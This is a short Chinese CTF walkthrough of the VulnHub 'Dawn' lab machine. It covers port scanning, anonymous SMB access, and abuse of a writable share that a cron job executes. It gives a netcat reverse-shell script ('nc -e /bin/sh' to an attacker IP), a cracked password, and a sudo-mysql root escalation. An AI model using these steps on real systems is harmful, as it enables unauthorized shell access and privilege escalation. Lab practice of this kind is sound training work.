VulnHub-Dawn

前言

　　这是打靶训练的第32周，难度低，靶机下载

信息搜集

　　nmap扫描结果

PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.38 ((Debian))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.5.5-10.3.15-MariaDB-1

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required

　　从结果上给出smb不需要密码即可登录，smbclient -L \\\\10.16.122.53获取共享信息，密码哪行直接回车即可
　　
　　共享名为ITDEPT，描述信息为PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY。意思是非授权用户，请立即离开！

　　smbclient \\\\10.16.122.53\\ITDEPT连接上共享名后，此目录下没有任何东西，无法跳出此目录，但可以上传文件。这里也就没啥信息了
　　
　　80端口
　　
　　通过dirsearch扫到一个/logs
　　
　　其中只有management.log能查看，其他的全部都是403
　　
　　可看到在/home/dawn/ITDEPT共享目录下，有product-control和web-control。并且隔一分钟就会执行一次。
　　
　　那么我们可以本地新建这个文件，文件内容为反弹shell，上传上去后，隔断时间就会反弹shell过来。

　　新建product-control 和web-control文件，内容如下

#!/bin/bash
nc -e /bin/sh 10.16.122.71 4444

　　之后将这两个文件put上去
　　
　　成功反弹shell
　　

提权

　　查看.bash_history文件，$1$$bOKpT2ijO.XcGlpjgAup9/貌似是个linux密码
　　
　　使用john爆破出密码为onii-chan29，尝试sudo su后发现密码不对。继续使用sudo -l
　　
　　可以以root权限使用mysql，使用此密码后提权成功